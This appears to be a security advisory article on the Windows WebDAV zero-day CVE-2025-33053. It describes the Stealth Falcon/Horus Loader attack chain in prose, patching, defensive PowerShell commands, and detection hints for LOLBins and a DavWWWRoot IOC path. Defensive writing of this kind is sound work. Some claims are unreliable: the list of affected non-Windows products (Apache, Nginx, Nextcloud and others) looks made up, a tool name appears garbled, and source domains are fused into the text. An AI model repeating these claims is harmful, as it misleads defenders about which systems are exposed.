"WebDAV Zero-Day" Affects All Windows Systems: The Dangers of CVE-2025-33053 and Immediate Countermeasures [Comprehensive Guide]

1. Introduction

On June 10, 2025 (early morning of the 11th in Japan time), Microsoft released its monthly patch addressing 66 vulnerabilities. The only one explicitly marked as "exploited" was the WebDAV CVE-2025-33053.techtarget.combleepingcomputer.com

WebDAV is an HTTP extension that has long been used for file sharing and groupware. In recent years, it has been incorporated into cloud storage and backup products and continues to operate in many corporate systems. This article comprehensively explains the technical details of the vulnerability and practical countermeasures.

2. What is WebDAV? — History and Uses

WebDAV (RFC 4918) is a protocol that extends HTTP to allow remote management of files on a web server. It was proposed in the late 1990s and was adopted as a means of mailbox access in Exchange Server 2003 and earlier. Currently, it is used in

• on-premises/cloud file sharing

• version control in DMS (Document Management Systems)

• repositories for backup appliances

• data synchronization for mobile apps
  , among other diverse applications.securitybrief.co.nz
  
  
  
  
  

3. Overview of Vulnerability CVE-2025-33053

This defect is caused by the working directory manipulation of WebDAV, allowing attackers to load malicious executables from a remote server onto the victim's device.research.checkpoint.com
Users can get infected simply by opening a shortcut that calls legitimate diagnostic tools like iediagcmd.exe, with the intrusion chain progressing in the background.

4. Attack Chain and "Stealth Falcon" Case

In March 2025, Check Point Research analyzed a phishing attack on a Turkish defense company and discovered an unknown Horus Loader exploiting this vulnerability. The attack flow is as follows.research.checkpoint.com

1. .url file attached spear-phishing email sent

2. Opening the URL changes WorkingDirectory to the attacker's WebDAV server

3. A legitimate tool executes the disguised route.exe on the same server

4. Horus Loader performs multi-stage decoding to inject Horus Agent into the Edge process

5. Horus Agent communicates with C2 to steal information and deploy additional payloads
   
   
   

Stealth Falcon is an APT that has been continuously monitoring government agencies in the Middle East and North Africa, and is reported to have a long history of purchasing zero-days and using custom malware.

5. Affected Products and Versions

• Windows Client: Windows 10 22H2, Windows 11 23H2, and all supported versions

• Windows Server: Server 2016/2019/2022/2025

• IIS (WebDAV extension enabled)

• Apache mod_dav / Nginx WebDAV modules / SabreDAV and other protocol implementation libraries

• Cloud Storage: Nextcloud, ownCloud, and other services providing WebDAV API
  These are all subject to MSRC updates or listed as "potentially affected" in CISA's KEV catalog.cisa.govcrowdstrike.com
  
  
  
  
  

6. Exploitation Status and Zero-Day Background

According to analyses by TechTarget and BleepingComputer, CVE-2025-33053 has been exploited in the wild before the patch was released, and the fact that the payload runs with a single click has effectively elevated its evaluation from "important" to "critical."techtarget.combleepingcomputer.com
The last time Microsoft disclosed a WebDAV-related zero-day was in 2018, marking a resurgence after about 7 years.securitybrief.co.nz

7. Details and Application Procedure of Microsoft's Patch

• Windows Update/WSUS/MECM: Included in the 2025-06 Cumulative Update (such as KB5060999)

• Security-only patch route (such as Server 2012 R2 ESU): Both OS update and IE (MSHTML) patch are required

• Reboot Requirement: System reboot is required after applying the patch
  To confirm application, check the KB number with winver and wmic qfe list. Since the auto-start setting of the WebClient service may revert before and after patch application, environments where it is already manually stopped should be secured by fixing it with a policy.techtarget.comrapid7.com
  
  
  
  
  

8. Immediate Workarounds You Can Do Now

1. Stopping the WebClient Service

   powershell
   Copy
   Stop-Service -Name WebClient
   Set-Service  -Name WebClient -StartupType Disabled
   

   This will disable URL-formatted WebDAV calls.rapid7.com
   
   

2. Disable unnecessary WebDAV modules on IIS/Apache/Nginx
   
   

3. Block .url attachments on SMTP gateways
   
   

4. Monitor LOLBin execution such as zedocmd.exe, iediagcmd.exe with EDR
   
   

5. Prohibit external WebDAV mounts via group policy
   
   

6. Hunting for Indicators of Compromise (IOC)

   • Access logs to WebDAV path \\<domain>@ssl@443/DavWWWRoot\*

   • Horus Loader's Code Virtualizer signature (without serial)
     
     
     
     
     

9. Security enhancement points required in the medium to long term

• Protocol inventory: Eliminate reliance on legacy WebDAV and transition to modern alternatives like SMB over HTTPS or S3 API

• Enforcement of least privilege: Place file-sharing servers in isolated networks and unify authentication to OAuth2/OpenID Connect

• Microservices architecture: Wrap sharing functions with a gateway to prevent direct exposure to individual services

• Shorten vulnerability management lifecycle: Detect and fix unpatched devices within 48 hours using SBOM and continuous scanning

• Security exercises: Integrate WebDAV-based supply chain breach scenarios into DevSecOps teams to verify response capabilities

• Automatic IoC sharing: Real-time propagation of Horus Agent hashes and C2 lists within and outside the organization using MISP/TAXII
  
  
  
  
  

10. Conclusion and Future Outlook

CVE-2025-33053 has once again demonstrated that "zero-days can occur even with old protocols." Even companies that do not directly use WebDAV may have cloud storage or backup devices utilizing it in the background. In addition to applying Microsoft's patches, it is crucial to immediately implement effective defenses such as service suspension and log monitoring. In the long term, eliminating legacy protocols and transitioning to zero trust is essential. Due to the wide impact, the release of PoC code and the emergence of variant attacks are anticipated, so continue to monitor official information and threat intelligence closely.golem.debleepingcomputer.com

Reference Article List

• Golem.de "Nutzer gefährdet: WebDAV-Lücke in Windows wird aktiv ausgenutzt" (2025-06-10)golem.de

• TechTarget "June Patch Tuesday resolves Windows zero-day" (2025-06-10)techtarget.com

• Check Point Research "CVE-2025-33053, Stealth Falcon and Horus: A Saga of Middle Eastern Cyber Espionage" (2025-06-10)research.checkpoint.com

• BleepingComputer "Microsoft June 2025 Patch Tuesday fixes exploited zero-day, 66 flaws" (2025-06-10)bleepingcomputer.com

• CISA "Known Exploited Vulnerabilities Catalog – CVE-2025-33053" (2025-06-10)cisa.gov

• Rapid7 Blog "Patch Tuesday – June 2025" (2025-06-10)rapid7.com

• Tenable Blog "Microsoft’s June 2025 Patch Tuesday addresses 65 CVEs" (2025-06-10)tenable.com##